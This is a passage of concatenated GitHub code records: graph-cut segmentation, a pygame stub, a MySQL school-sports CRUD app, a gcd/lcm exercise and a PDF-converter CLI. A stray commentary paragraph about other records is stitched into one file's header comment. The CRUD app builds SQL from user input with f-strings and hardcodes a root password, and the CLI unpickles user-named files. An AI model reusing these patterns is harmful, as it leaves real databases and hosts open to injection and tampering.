print(p['_id'])\n\n","repo_name":"LabPorject/CMPT733-final-project","sub_path":"mongodb_integration/create_tmdb.py","file_name":"create_tmdb.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13369963018","text":"from __future__ import annotations\n#############################\n# 
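The Russian docstring in the 14.py record above translates as: "Series14. Given an integer K and a set of nonzero integers, terminated by the number 0, output how many numbers in the set are less than K." The neighbouring acmicpc_20920.py record ranks vocabulary by descending frequency, then descending length, then alphabetically, using one composite sort key; a distilled sketch of that trick with made-up data:

words = {"apple": 3, "banana": 3, "fig": 5, "cherry": 3}

# one key tuple encodes all three criteria: negate the numeric fields that
# should sort descending, keep the string itself for the ascending tiebreak
ranked = sorted(words.items(), key=lambda kv: (-kv[1], -len(kv[0]), kv[0]))

assert [w for w, _ in ranked] == ["fig", "banana", "cherry", "apple"]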
Various Graph Cut Algorithms which operate on the ImageGraph \n# representation of an image. Seeding of any sort is represented in the \n# ImageGraph object. These algorithms should further be able to label \n# the non-seeded pixels in the ImageGraph object they are given. \n#\n# Matthew Hokinson, 12/7/22\n#############################\n\nfrom collections import deque\nimport maxflow \n\nfrom .imageGraph import ImageGraph \n\ndef biggerBetterFasterStronger(imageGraph: ImageGraph) -> None:\n \"\"\"\n Max Flow Graph Cut Algorithm\n\n The results of the cut are stored in the given ImageGraph object. We run \n a max flow algorithm. The algorithm terminates when there are no remaining \n paths from the source to the sink.\n\n Args:\n imageGraph (ImageGraph): ImageGraph representation of the image\n \"\"\"\n # Create a maxflow graph\n graph = maxflow.Graph[int](imageGraph.N, 3 * imageGraph.N)\n # Add the nodes\n nodes = {node: graph.add_nodes(1) for node in imageGraph.get_vertices()}\n\n # Add the edges\n for node in imageGraph.get_vertices():\n for neighbor in imageGraph.get_edges(node).keys():\n # Add the edge\n weight = imageGraph.get_edge_weight(node, neighbor)\n graph.add_edge(nodes[node], nodes[neighbor], weight, weight)\n\n # Add the source and sink edge\n for node in imageGraph.get_vertices():\n if node == imageGraph.source or node == imageGraph.sink:\n continue\n \n # Add the edge\n graph.add_tedge(nodes[node], imageGraph.get_edge_weight(node, imageGraph.source), \n imageGraph.get_edge_weight(node, imageGraph.sink))\n\n # Run the max flow algorithm\n graph.maxflow()\n\n # Label the nodes\n for node in imageGraph.get_vertices():\n # print(f\"Node {node} has segment {graph.get_segment(nodes[node])}\")\n if graph.get_segment(nodes[node]) == 0:\n imageGraph.set_label(node, ImageGraph.Label.FOREGROUND)\n else:\n imageGraph.set_label(node, ImageGraph.Label.BACKGROUND)\n\ndef pushRelabelCut(imageGraph: ImageGraph) -> None:\n \"\"\"\n Push-Relabel Graph Cut Algorithm\n\n The results of the cut are stored in the given ImageGraph object. We run \n a push-relabel max flow algorithm. 
The algorithm terminates when there are no remaining \n paths from the source to the sink.\n\n Ref: https://cp-algorithms.com/graph/push-relabel.html#implementation\n\n Args:\n imageGraph (ImageGraph): ImageGraph representation of the image\n \"\"\"\n # Need to track current height, excess, flow, and capacity of each node (capacity in graph) \n heights = {node: 0 for node in imageGraph.get_vertices()}\n excess = {node: 0 for node in imageGraph.get_vertices()}\n flow = {node: {neighbor: 0 for neighbor in imageGraph.get_edges(node).keys()} for node in imageGraph.get_vertices()}\n excessQueue = deque()\n\n def _push(node: ImageGraph.Node, neighbor: ImageGraph.Node) -> None:\n \"\"\"\n Push operation for the push-relabel algorithm\n\n Args:\n node (ImageGraph.Node): Node to push from\n neighbor (ImageGraph.Node): Node to push to\n \"\"\"\n # Find the amount to push\n pushAmount = min(excess[node], imageGraph.get_edge_weight(node, neighbor) - flow[node][neighbor])\n\n # Update the flow\n flow[node][neighbor] += pushAmount\n flow[neighbor][node] -= pushAmount # negative flow in the revese direction, should be ok even with undirected graph \n\n # Update the excess\n excess[node] -= pushAmount\n excess[neighbor] += pushAmount\n\n # Add neighbor to the queue if it has excess \n # If the excess is the push amount, then we know it wasn't in the queue before\n if excess[neighbor] == pushAmount:\n excessQueue.appendleft(neighbor)\n \n def _relabel(node: ImageGraph.Node) -> None:\n \"\"\"\n Relabel operation for the push-relabel algorithm. Set the height \n of node to be the minimum height of its neighbors + 1\n\n Args:\n node (ImageGraph.Node): Node to relabel\n \"\"\"\n # Find the minimum height of the neighbors where there is some remaining capacity\n neighborsWithCapacity = [neighbor for neighbor in imageGraph.get_neighbors(node) if flow[node][neighbor] < imageGraph.get_edge_weight(node, neighbor)]\n\n # If there are no neighbors with capacity, then we can't relabel\n if len(neighborsWithCapacity) == 0:\n return\n\n # Update the height\n minNeighborHeight = min(heights[neighbor] for neighbor in neighborsWithCapacity)\n heights[node] = minNeighborHeight + 1\n\n def _discharge(node: ImageGraph.Node) -> None:\n \"\"\"\n Discharge operation for the push-relabel algorithm. 
Pushes as much \n as possible from the node, then relabels if necessary\n\n Args:\n node (ImageGraph.Node): Node to discharge\n \"\"\"\n while excess[node] > 0:\n # Find the neighbors with capacity and lower height \n neighborsWithCapacity = [neighbor for neighbor in imageGraph.get_neighbors(node) \n if flow[node][neighbor] < imageGraph.get_edge_weight(node, neighbor) and heights[node] > heights[neighbor]]\n\n # If there are no neighbors with capacity, then we need to relabel\n if len(neighborsWithCapacity) == 0:\n _relabel(node)\n continue\n\n # Push to the neightbors while we have excess \n for neighbor in neighborsWithCapacity:\n if excess[node] <= 0:\n break\n _push(node, neighbor)\n\n # Initialize the height and preflow for the source\n if imageGraph.source is None or imageGraph.sink is None:\n raise ValueError(\"Source or Sink is not set!\")\n\n heights[imageGraph.source] = imageGraph.N\n sumSourceWeights = sum(imageGraph.get_edges(imageGraph.source).values())\n excess[imageGraph.source] = sumSourceWeights\n for neighbor in imageGraph.get_neighbors(imageGraph.source):\n _push(imageGraph.source, neighbor)\n\n while len(excessQueue) > 0:\n # print(len(excessQueue))\n node = excessQueue.pop()\n\n if node == imageGraph.source or node == imageGraph.sink:\n continue\n _discharge(node)\n\n # Set the labels of the nodes in the imageGraph based on nodes which \n # node still have capacity to the source (foreground) or sink (background)\n # Trivially, nodes can only have remaining capacity in one or the other, otherwise there \n # would still be a path from the source to the sink\n for node in imageGraph.get_vertices():\n if node == imageGraph.source or node == imageGraph.sink:\n continue\n\n # If there is still capacity from source to node, then it is foreground\n # We will have subtracted flow from source to node if we pushed back\n if flow[imageGraph.source][node] < imageGraph.get_edge_weight(node, imageGraph.source):\n imageGraph.set_label(node, ImageGraph.Label.FOREGROUND)\n else:\n imageGraph.set_label(node, ImageGraph.Label.BACKGROUND)","repo_name":"MHokinson38/ForegroundExtraction","sub_path":"ExtractionMethods/Utils/minCutAlgorithms.py","file_name":"minCutAlgorithms.py","file_ext":"py","file_size_in_byte":7231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36238613458","text":"import pygame\nfrom pygame.locals import *\nfrom classes import InfoBackground\n\ndef login():\n pygame.init()\n screen = pygame.display.set_mode((800, 600))\n infobg = InfoBackground((0, 0))\n pygame.display.set_caption('Piano')\n\n while True:\n for event in pygame.event.get():\n if (event.type == KEYDOWN and event.key == 27) or (event.type == QUIT):\n # ESC key, exit game\n return\n\n screen.fill((255, 255, 255))\n screen.blit(infobg.image, infobg.rect)\n\n pygame.display.flip()\n\nif __name__ == '__main__':\n login()\n","repo_name":"categulario/piano","sub_path":"session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"71040180647","text":"import mysql.connector\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport PySimpleGUI as sg\r\n\r\n\r\ndef CriarBanco(cursor):\r\n\r\n comando = '''CREATE TABLE Alunos(\r\n id_Alunos INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,\r\n Nome VARCHAR(30),\r\n Sexo CHAR(1)\r\n );'''\r\n cursor.execute(comando)\r\n comando = '''CREATE TABLE Eventos(\r\n id_Eventos INTEGER 
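biggerBetterFasterStronger in the minCutAlgorithms.py record above delegates to PyMaxflow: every pixel becomes a node, neighbour edges get symmetric capacities, add_tedge wires source/sink affinities, and after maxflow() each node's get_segment gives its side of the cut. A self-contained toy cut using the same PyMaxflow calls (weights are arbitrary):

import maxflow

g = maxflow.Graph[int](2, 2)
nodes = g.add_nodes(2)

# one neighbour edge with equal capacity in both directions
g.add_edge(nodes[0], nodes[1], 1, 1)

# add_tedge(node, capacity from source, capacity to sink)
g.add_tedge(nodes[0], 5, 0)   # node 0 strongly pulled to the source
g.add_tedge(nodes[1], 0, 5)   # node 1 strongly pulled to the sink

flow = g.maxflow()
assert flow == 1                      # only the weak middle edge is cut
assert g.get_segment(nodes[0]) == 0   # 0 = source side (foreground)
assert g.get_segment(nodes[1]) == 1   # 1 = sink side (background)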
NOT NULL AUTO_INCREMENT PRIMARY KEY,\r\n id_Alunos_fk INTEGER NOT NULL,\r\n Esporte VARCHAR(30),\r\n FOREIGN KEY(id_Alunos_fk) REFERENCES Alunos (id_Alunos) on update cascade on delete cascade\r\n);'''\r\n cursor.execute(comando)\r\n comando = '''CREATE TABLE Turmas(\r\n id_Turma INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,\r\n id_eventos_fk INTEGER NOT NULL,\r\n id_Alunos_fk INTEGER NOT NULL,\r\n Serie CHAR(1),\r\n Turma CHAR(1),\r\n FOREIGN KEY(id_eventos_fk) REFERENCES Eventos (id_Eventos) on update cascade on delete cascade, \r\n FOREIGN KEY(id_Alunos_fk) REFERENCES Alunos (id_Alunos) on update cascade on delete cascade\r\n );'''\r\n cursor.execute(comando)\r\n comando = '''INSERT INTO Alunos(Nome, Sexo)VALUES\r\n (\"Neymar\",\"M\"),\r\n (\"Juliana\",\"F\"),\r\n (\"Joselina\",\"F\"),\r\n (\"Marta\",\"F\");'''\r\n cursor.execute(comando)\r\n comando = '''INSERT INTO Eventos(id_Alunos_fk, Esporte)VALUES\r\n (1,\"Futebol\"),\r\n (2,\"Volei\"),\r\n (3,\"Volei\"),\r\n (4,\"Futebol\");'''\r\n cursor.execute(comando)\r\n comando = '''INSERT INTO Turmas(id_eventos_fk,id_Alunos_fk,Serie,Turma)VALUES\r\n (1,2,3,\"A\"),\r\n (2,1,1,\"A\"),\r\n (3,3,2,\"B\"),\r\n (4,4,3,\"C\");'''\r\n cursor.execute(comando)\r\n\r\nconexao = mysql.connector.connect(\r\n host = 'localhost',\r\n user = 'root',\r\n password = 'sephirothFF7'\r\n)\r\n\r\ncursor = conexao.cursor()\r\ncomando = 'create database semanadejogos;'\r\ncursor.execute(comando)\r\nconexao.database = 'semanadejogos'\r\n\r\nEsportes = [\"Futebol\",\"Volei\"]\r\nSexo = [\"M\",\"F\"]\r\nSeries = [3,2,1]\r\nTurmas = [\"A\",\"B\",\"C\"]\r\n\r\nCriarBanco(cursor)\r\n\r\n\r\ndef CadastrarAluno(id):\r\n if id == 0:\r\n layout = [\r\n [sg.Text('Digite o nome do Aluno e seu genero')],\r\n [sg.Text('Nome: ', size=(10, 1)), sg.Input(key='nome')],\r\n [sg.Combo(values=Sexo, key=\"sexo\", size=(20, 1))],\r\n [sg.Button('Entrar: ', button_color='green'), sg.Button('Cancelar', button_color='red')],\r\n ]\r\n\r\n janela = sg.Window('Cadastro de Aluno', layout, element_justification='center')\r\n evento, dados = janela.read()\r\n nome = dados['nome']\r\n sexo = dados['sexo']\r\n comando = f'INSERT INTO Alunos(Nome, Sexo)VALUES(\"{nome}\",\"{sexo}\")'\r\n cursor.execute(comando)\r\n conexao.commit()\r\n janela.close()\r\n else:\r\n layout = [\r\n [sg.Text('Digite o nome do Aluno e seu genero')],\r\n [sg.Text('Nome: ', size=(10, 1)), sg.Input(key='nome')],\r\n [sg.Combo(values=Sexo, key=\"sexo\", size=(20, 1))],\r\n [sg.Button('Entrar: ', button_color='green'), sg.Button('Cancelar', button_color='red')],\r\n ]\r\n\r\n janela = sg.Window('Cadastro de Aluno', layout, element_justification='center')\r\n evento, dados = janela.read()\r\n nome = dados['nome']\r\n sexo = dados['sexo']\r\n comando = f'UPDATE Alunos SET Nome = \"{nome}\", sexo=\"{sexo}\" where id_Alunos={id}'\r\n cursor.execute(comando)\r\n conexao.commit()\r\n janela.close()\r\n\r\n\r\n\r\n\r\ndef CadastrarEvento(id):\r\n if id == 0:\r\n layout = [\r\n [sg.Text('Digite o id do aluno e o nome do esporte')],\r\n [sg.Text('id: ', size=(10, 1)), sg.Input(key='id')],\r\n [sg.Combo(values=Esportes, key=\"esporte\", size=(20, 1))],\r\n [sg.Button('Entrar: ', button_color='green'), sg.Button('Cancelar', button_color='red')],\r\n ]\r\n\r\n janela = sg.Window('Cadastro de Aluno', layout, element_justification='center')\r\n evento, dados = janela.read()\r\n id = dados['id']\r\n Esporte = dados['esporte']\r\n comando = f'INSERT INTO Eventos(id_Alunos_fk, Esporte)VALUES({id},\"{Esporte}\")'\r\n 
cursor.execute(comando)\r\n        conexao.commit()\r\n        janela.close()\r\n    else:\r\n        layout = [\r\n            [sg.Text('Digite o id do aluno e o nome do esporte')],\r\n            [sg.Text('id: ', size=(10, 1)), sg.Input(key='id')],\r\n            [sg.Combo(values=Esportes, key=\"esporte\", size=(20, 1))],\r\n            [sg.Button('Entrar: ', button_color='green'), sg.Button('Cancelar', button_color='red')],\r\n        ]\r\n\r\n        janela = sg.Window('Cadastro de Aluno', layout, element_justification='center')\r\n        evento, dados = janela.read()\r\n        id_cadastro = dados['id']\r\n        Esporte = dados['esporte']\r\n        comando = f'UPDATE Eventos SET id_Alunos_fk = {id_cadastro}, Esporte=\"{Esporte}\" where id_Eventos={id}'\r\n        cursor.execute(comando)\r\n        conexao.commit()\r\n        janela.close()\r\n\r\n\r\ndef CadastrarTurma(id):\r\n    if id == 0:\r\n        layout = [\r\n            [sg.Text('Digite o id do evento, id do aluno, Serie e Turma')],\r\n            [sg.Text('id_Evento: ', size=(10, 1)), sg.Input(key='id_evento')],\r\n            [sg.Text('id_aluno', size=(10, 1)), sg.Input(key='id_aluno')],\r\n            [sg.Combo(values=Series, key=\"serie\", size=(20, 1))],\r\n            [sg.Combo(values=Turmas, key=\"turma\", size=(20, 1))],\r\n            [sg.Button('Entrar: ', button_color='green'), sg.Button('Cancelar', button_color='red')],\r\n        ]\r\n\r\n        janela = sg.Window('Cadastro de Aluno', layout, element_justification='center')\r\n        evento, dados = janela.read()\r\n        id_evento = dados['id_evento']\r\n        id_aluno = dados['id_aluno']\r\n        Serie = dados['serie']\r\n        Turma = dados['turma']\r\n        comando = f'INSERT INTO Turmas(id_eventos_fk,id_Alunos_fk,Serie,Turma)VALUES({id_evento},{id_aluno},\"{Serie}\",\"{Turma}\")'\r\n        cursor.execute(comando)\r\n        conexao.commit()\r\n        janela.close()\r\n    else:\r\n        layout = [\r\n            [sg.Text('Digite o id do evento, id do aluno, Serie e Turma')],\r\n            [sg.Text('id_Evento: ', size=(10, 1)), sg.Input(key='id_evento')],\r\n            [sg.Text('id_aluno', size=(10, 1)), sg.Input(key='id_aluno')],\r\n            [sg.Combo(values=Series, key=\"serie\", size=(20, 1))],\r\n            [sg.Combo(values=Turmas, key=\"turma\", size=(20, 1))],\r\n            [sg.Button('Entrar: ', button_color='green'), sg.Button('Cancelar', button_color='red')],\r\n        ]\r\n\r\n        janela = sg.Window('Cadastro de Aluno', layout, element_justification='center')\r\n        evento, dados = janela.read()\r\n        id_evento = dados['id_evento']\r\n        id_aluno = dados['id_aluno']\r\n        Serie = dados['serie']\r\n        Turma = dados['turma']\r\n        comando = f'UPDATE Turmas SET id_Eventos_fk = {id_evento},id_Alunos_fk = {id_aluno},Serie=\"{Serie}\",Turma=\"{Turma}\" where id_Turma={id}'\r\n        cursor.execute(comando)\r\n        conexao.commit()\r\n        janela.close()\r\n\r\n\r\n\r\ndef Grafico_Genero_Esporte():\r\n    Qtd_Masculino_Futebol = 0\r\n    Qtd_Masculino_Volei = 0\r\n    Qtd_Futebol = 0\r\n    Qtd_Volei = 0\r\n\r\n\r\n    Comando = f'''SELECT Sexo, Esporte FROM Alunos, Eventos\r\n    where id_Alunos = id_Alunos_fk;'''\r\n    cursor.execute(Comando)\r\n    resultado = cursor.fetchall()\r\n    i = 0\r\n    for i in range(len(resultado)):\r\n        if resultado[i][1] == \"Futebol\":\r\n            if resultado[i][0] == \"M\":\r\n                Qtd_Masculino_Futebol+=1\r\n            Qtd_Futebol += 1\r\n        elif resultado[i][1] == \"Volei\":\r\n            if resultado[i][0] == \"M\":\r\n                Qtd_Masculino_Volei+=1\r\n            Qtd_Volei+=1\r\n    Cont_Genero = [Qtd_Masculino_Futebol,Qtd_Masculino_Volei]\r\n    Qtd_Incrito_por_Esporte = [Qtd_Futebol,Qtd_Volei]\r\n\r\n    plt.bar(Esportes,Qtd_Incrito_por_Esporte,color='pink', label=\"Quantidade de Menina\")\r\n    plt.bar(Esportes,Cont_Genero,color='b',label=\"Quantidade de Menino\")\r\n    plt.legend()\r\n    plt.show()\r\n\r\n\r\ndef Grafico_Genero_Turma():\r\n    Qtd_Masculino_3 = 0\r\n    
Qtd_Masculino_2 = 0\r\n Qtd_Masculino_1 = 0\r\n\r\n Qtd_3 = 0\r\n Qtd_2 = 0\r\n Qtd_1 = 0\r\n\r\n\r\n\r\n Comando = f'''SELECT Sexo, Serie FROM Alunos, Turmas\r\n where id_Alunos = id_Alunos_fk;'''\r\n cursor.execute(Comando)\r\n resultado = cursor.fetchall()\r\n i = 0\r\n print(resultado)\r\n for i in range(len(resultado)):\r\n if resultado[i][1] == '3':\r\n if resultado[i][0] == \"M\":\r\n Qtd_Masculino_3+=1\r\n Qtd_3 += 1\r\n elif resultado[i][1] == '2':\r\n if resultado[i][0] == \"M\":\r\n Qtd_Masculino_2+=1\r\n Qtd_2+=1\r\n elif resultado[i][1] == '1':\r\n if resultado[i][0] == \"M\":\r\n Qtd_Masculino_1 += 1\r\n Qtd_1 += 1\r\n\r\n Cont_Genero = [Qtd_Masculino_3,Qtd_Masculino_2,Qtd_Masculino_1]\r\n Qtd_Incrito_por_Turma = [Qtd_3,Qtd_2,Qtd_1]\r\n\r\n plt.bar(Series,Qtd_Incrito_por_Turma,color='pink', label=\"Quantidade de Menina\")\r\n plt.bar(Series,Cont_Genero,color='b',label=\"Quantidade de Menino\")\r\n plt.legend()\r\n plt.show()\r\n\r\ndef Grafico_Esporte_MaisEcolhido():\r\n Contagem_Futebol = 0\r\n Contagem_Volei = 0\r\n\r\n Comando = f'''SELECT Esporte FROM Eventos'''\r\n cursor.execute(Comando)\r\n resultado = cursor.fetchall()\r\n i = 0\r\n for i in range(len(resultado)):\r\n if resultado[i][0] == \"Futebol\":\r\n Contagem_Futebol +=1\r\n else:\r\n Contagem_Volei +=1\r\n\r\n\r\n Apuração = [Contagem_Futebol,Contagem_Volei]\r\n plt.pie(Apuração,labels=Esportes,autopct='%1.0f%%')\r\n plt.legend()\r\n plt.show()\r\n\r\ndef Atualizar():\r\n layout = [\r\n [sg.Text('Digite o nome do que você quer mudar(Nome, Evento, Turma) e o ID')],\r\n [sg.Text('Nome: ', size=(10, 1)), sg.Input(key='nome')],\r\n [sg.Text('ID:', size=(10, 1)), sg.Input(key='id')],\r\n [sg.Button('Entrar: ', button_color='green'), sg.Button('Cancelar', button_color='red')],\r\n ]\r\n janela = sg.Window('Cadastro de Aluno', layout, element_justification='center')\r\n evento, dados = janela.read()\r\n nome_Atualizar = dados['nome']\r\n id_atualizar = dados['id']\r\n\r\n if nome_Atualizar == 'Evento':\r\n CadastrarEvento(id_atualizar)\r\n elif nome_Atualizar == 'Turma':\r\n CadastrarTurma(id_atualizar)\r\n else:\r\n CadastrarAluno(id_atualizar)\r\n janela.close()\r\n\r\ndef Listar():\r\n comando = 'SELECT Nome,Sexo,Esporte FROM Alunos, Eventos where id_Alunos = id_Alunos_fk;'\r\n cursor.execute(comando)\r\n resultado = cursor.fetchall()\r\n layout = [\r\n [sg.Listbox(values=resultado, size=(30, 6), key='esc')],\r\n [sg.Button('OK')]\r\n ]\r\n janela = sg.Window('esc', layout)\r\n evento, dados = janela.read()\r\n janela.close()\r\n comando = 'SELECT Nome,Serie,Turma FROM Alunos, Turmas where id_Alunos = id_Alunos_fk;'\r\n cursor.execute(comando)\r\n resultado = cursor.fetchall()\r\n layout = [\r\n [sg.Listbox(values=resultado, size=(30, 6), key='esc')],\r\n [sg.Button('OK')]\r\n ]\r\n janela = sg.Window('esc', layout)\r\n evento, dados = janela.read()\r\n janela.close()\r\n\r\ndef Deletar():\r\n layout = [\r\n [sg.Text('Digite o nome do que você quer Deletar(Nome, Evento, Turma) e o ID')],\r\n [sg.Text('Nome: ', size=(10, 1)), sg.Input(key='nome')],\r\n [sg.Text('ID:', size=(10, 1)), sg.Input(key='id')],\r\n [sg.Button('Entrar: ', button_color='green'), sg.Button('Cancelar', button_color='red')],\r\n ]\r\n janela = sg.Window('Cadastro de Aluno', layout, element_justification='center')\r\n evento, dados = janela.read()\r\n nome_Atualizar = dados['nome']\r\n id_atualizar = dados['id']\r\n\r\n if nome_Atualizar == 'Evento':\r\n comando = f'DELETE from Eventos where id_Eventos= {id_atualizar}'\r\n 
cursor.execute(comando)\r\n conexao.commit()\r\n elif nome_Atualizar == 'Turma':\r\n comando = f'DELETE from Turmas where id_Turma= {id_atualizar}'\r\n cursor.execute(comando)\r\n conexao.commit()\r\n else:\r\n comando = f'DELETE from Alunos where id_Alunos= {id_atualizar}'\r\n cursor.execute(comando)\r\n conexao.commit()\r\n\r\n janela.close()\r\n\r\n\r\nescolha = ''\r\nwhile escolha != '8 - Sair':\r\n\r\n opções = ['1 - Cadastrar', '2 - Atualizar', '3 - Listar', '4 - Deletar',\r\n '5 - Gráfico Relação Gênero Turma', '6 - Grafico Esporte mais escolhido', '7 - Grafico Relação Gênero Eventos', '8 - Sair']\r\n\r\n layout = [\r\n [sg.Listbox(values=opções, size=(30, 10), key='esc')],\r\n [sg.Button('OK')]\r\n ]\r\n janela = sg.Window('Menu principal', layout)\r\n evento, dados = janela.read()\r\n\r\n\r\n escolha = dados['esc'][0]\r\n janela.close()\r\n\r\n\r\n if escolha == '1 - Cadastrar':\r\n CadastrarAluno(0)\r\n CadastrarEvento(0)\r\n CadastrarTurma(0)\r\n\r\n\r\n if escolha == '2 - Atualizar':\r\n Atualizar()\r\n if escolha == '3 - Listar':\r\n Listar()\r\n\r\n if escolha == '4 - Deletar':\r\n Deletar()\r\n if escolha == '5 - Gráfico Relação Gênero Turma':\r\n Grafico_Genero_Turma()\r\n if escolha == '6 - Grafico Esporte mais escolhido':\r\n Grafico_Esporte_MaisEcolhido()\r\n if escolha == '7 - Grafico Relação Gênero Eventos':\r\n Grafico_Genero_Esporte()\r\n","repo_name":"Luiz-Henrique03/Python_SQL","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":13266,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21027620989","text":"# 2609\nimport sys\nfrom math import gcd\n#a, b = map(int,sys.stdin.readline().split())\n\na=24\nb=18\n\n# 유클리드 호제법 \n# 내장함수써도댐\ndef gcd(a,b):\n \n while b > 0:\n a,b = b, a%b\n return a\n\ndef lcm(a,b):\n return((a*b)//gcd(a,b))\n\nprint(gcd(a,b))\nprint(lcm(a,b))\n\n'''\n\nfor i in range (min(a,b),0,-1):\n if a%i == 0 and b%i== 0:\n print(i)\n break\n\n\nfor i in range(max(a,b),(a*b),+1):\n if i%a ==0 and i%b ==0:\n print(i)\n break \n'''\n","repo_name":"skylermbang/Lectures-","sub_path":"algo/question16.py","file_name":"question16.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16671978408","text":"import os\nimport sys\nimport argparse\nimport gettext\nimport pickle\nimport locale\nimport logging\nimport traceback\n\nfrom PIL import Image\nfrom stpdf.core.converter import Converter\nfrom pytesseract import image_to_string\nfrom pytesseract.pytesseract import TesseractNotFoundError\nfrom _version import (__version__, __version2__, __releaseDate__,\n __releaseDate2__, __developer__, __developer2__,\n __devhome__)\n\n\nclass STPDFCLI(object):\n def __init__(self, source, dest, *args, **kwargs):\n self.source = source\n self.dest = dest\n self.logger = kwargs.get(\"logger\")\n self.settings = kwargs.get(\"settings\")\n self.args = kwargs.get(\"uargs\")\n self.res = kwargs.get(\"resolution\", 90.0)\n self.deskew = kwargs.get(\"deskew\", False)\n self.app_lang = self.settings[\"lang\"]\n if not self.check_tesseract() and self.deskew:\n m = _(\"Setting deskew to false, tesseract wasn't found on your machine\")\n self.logger.warning(m)\n self.deskew = False\n self.print_values()\n\n def print_values(self):\n s = _(\"Source\")\n d = _(\"Destination\")\n splt = _(\"Split\")\n splt_a = _(\"Split at\")\n dsk = _(\"Deskew\")\n r = _(\"Resolution\")\n dc = _(\"Do copy\")\n mp = 
_(\"Make PDF\")\n ll = _(\"Log level\")\n l = _(\"Language\")\n sk = _(\"Skip check\")\n v0 = \"\\n\\t%s: %s\\n\\t%s: %s\" % (s, self.source, d, self.dest)\n v1 = \"\\n\\t%s: %s\\n\\t%s: %s\" % (splt, self.settings[\"split\"],\n splt_a, self.settings[\"split_at\"])\n v2 = \"\\n\\t%s: %s\\n\\t%s: %s\" % (dsk, self.settings[\"deskew\"],\n r, self.settings[\"res\"])\n v3 = \"\\n\\t%s: %s\\n\\t%s: %s\" % (dc, self.settings[\"d_copy\"],\n mp, self.settings[\"m_pdf\"])\n v4 = \"\\n\\t%s: %s\\n\\t%s: %s\" % (ll, self.settings[\"log_level\"],\n l, self.settings[\"lang\"])\n v5 = \"\\n\\t%s: %s\" % (sk, self.settings[\"skip_check\"])\n values = v0 + v1 + v2 + v3 + v4 + v5\n msg = \"%s:%s\" % (_(\"Starting converter with values\"), values)\n self.logger.info(msg)\n if not self.settings[\"skip_check\"]:\n ans = input(\"Continue? (Y): \")\n if ans.upper() != \"Y\":\n self.logger.info(_(\"Exiting now\"))\n sys.exit(1)\n\n def run_converter(self):\n splt = (self.settings[\"split\"], self.settings[\"split_at\"])\n cvt = Converter(self.source, self.dest,\n split=splt,\n deskew=self.deskew,\n lang=self.app_lang,\n save_files=self.settings[\"d_copy\"],\n make_pdf=self.settings[\"m_pdf\"])\n try:\n for line in cvt.process_all():\n self.logger.info(line)\n except Exception as e:\n self.logger.critical(\"Critical exception:\\n\" + str(e) + \"\\n\\n\" + \"Exiting now\")\n sys.exit(1)\n\n def check_tesseract(self):\n img = Image.new('RGB', (60, 30), color='red')\n try:\n image_to_string(img)\n img.close()\n return True\n except TesseractNotFoundError:\n img.close()\n return False\n\n\n# Function to verify correct usage of args\n# before providing them to STPDFCLI\ndef verify_args(args):\n kv = getattr(args, \"kv\", None)\n lv = getattr(args, \"lv\", None)\n if kv is not None and lv is not None:\n return _(\"Can't use --keep-values with --load-values\")\n if lv is None:\n if not os.path.isdir(args.source) or not os.path.isdir(args.destination):\n msd = _(\"Missing source or destination\")\n s = _(\"Source\")\n d = _(\"Destination\")\n msg = \"%s\\n\\t%s: %s\\n\\t%s: %s\" % (msd, s, d, args.source,\n args.destination)\n return msg\n s = getattr(args, \"s\", None)\n if s is not None:\n try:\n if int(s) <= 2:\n return \"%s: %s\" % (_(\"Split at value too low\"), s)\n except ValueError as e:\n return \"%s: %s\" % (_(\"Split at must be a number\"), s)\n r = getattr(args, \"r\", None)\n if r is not None:\n if r > 100.0:\n return _(\"Max resolution is 100.0\")\n return True\n\n\n# Installs language based on lang: str - \"en\" or \"pt\"\ndef install_lang(lang):\n available_langs = [\n \"en\",\n \"pt\",\n \"es\"\n ]\n if lang in available_langs and lang != \"en\":\n modl = \"%s_cli\" % lang\n current_locale, __ = locale.getdefaultlocale()\n cl = current_locale.split(\"_\")\n if lang != cl[0]:\n current_locale = \"%s_%s\" % (lang, lang.upper())\n lang = gettext.translation(modl,\n \"locale\",\n [current_locale])\n lang.install()\n\n\ndef check_settings(args):\n kv = getattr(args, \"kv\")\n lv = getattr(args, \"lv\")\n splt_a = getattr(args, \"sa\") or 0\n splt = True if splt_a > 0 else False\n settings = {\n \"source\": getattr(args, \"source\"),\n \"dest\": getattr(args, \"destination\"),\n \"split\": splt,\n \"split_at\": splt_a,\n \"deskew\": getattr(args, \"ds\"),\n \"res\": getattr(args, \"r\"),\n \"d_copy\": False,\n \"m_pdf\": True,\n \"log_level\": \"INFO\",\n \"lang\": getattr(args, \"l\"),\n \"skip_check\": getattr(args, \"sc\")\n }\n if kv is not None:\n kv = \"%s.pckl\" % kv if not kv.endswith(\".pckl\") else 
kv\n if not os.path.isfile(kv):\n pickle.dump(settings, open(kv, \"wb\"))\n else:\n raise FileExistsError(kv)\n elif lv is not None:\n lv = \"%s.pckl\" % lv if not lv.endswith(\".pckl\") else lv\n if not os.path.isfile(lv):\n raise FileNotFoundError(lv)\n else:\n settings = pickle.load(open(lv, \"rb\"))\n return settings\n\n\ndef install_logger(l_level):\n l_levels = [\n \"INFO\",\n \"WARNING\",\n \"CRITICAL\",\n \"ERROR\",\n \"DEBUG\"\n ]\n n_level = None\n if l_level not in l_levels:\n sys.stdout.write(\"%s: %s\\n\" % (_(\"Invalid log level\"), l_level))\n l_level = \"INFO\"\n n_level = getattr(logging, l_level.upper(), 10)\n # Console logger\n log_format = \"%(name)s - %(levelname)s: %(message)s\"\n logging.basicConfig(format=log_format, level=n_level)\n logger = logging.getLogger(\"STPDF-CLI\")\n msg = \"%s: %s\" % (_(\"Console logger is set with log level\"), l_level)\n logger.info(msg)\n return logger\n\n\n# Assembles argparser and returns parsed args\ndef assemble_parser():\n parser = 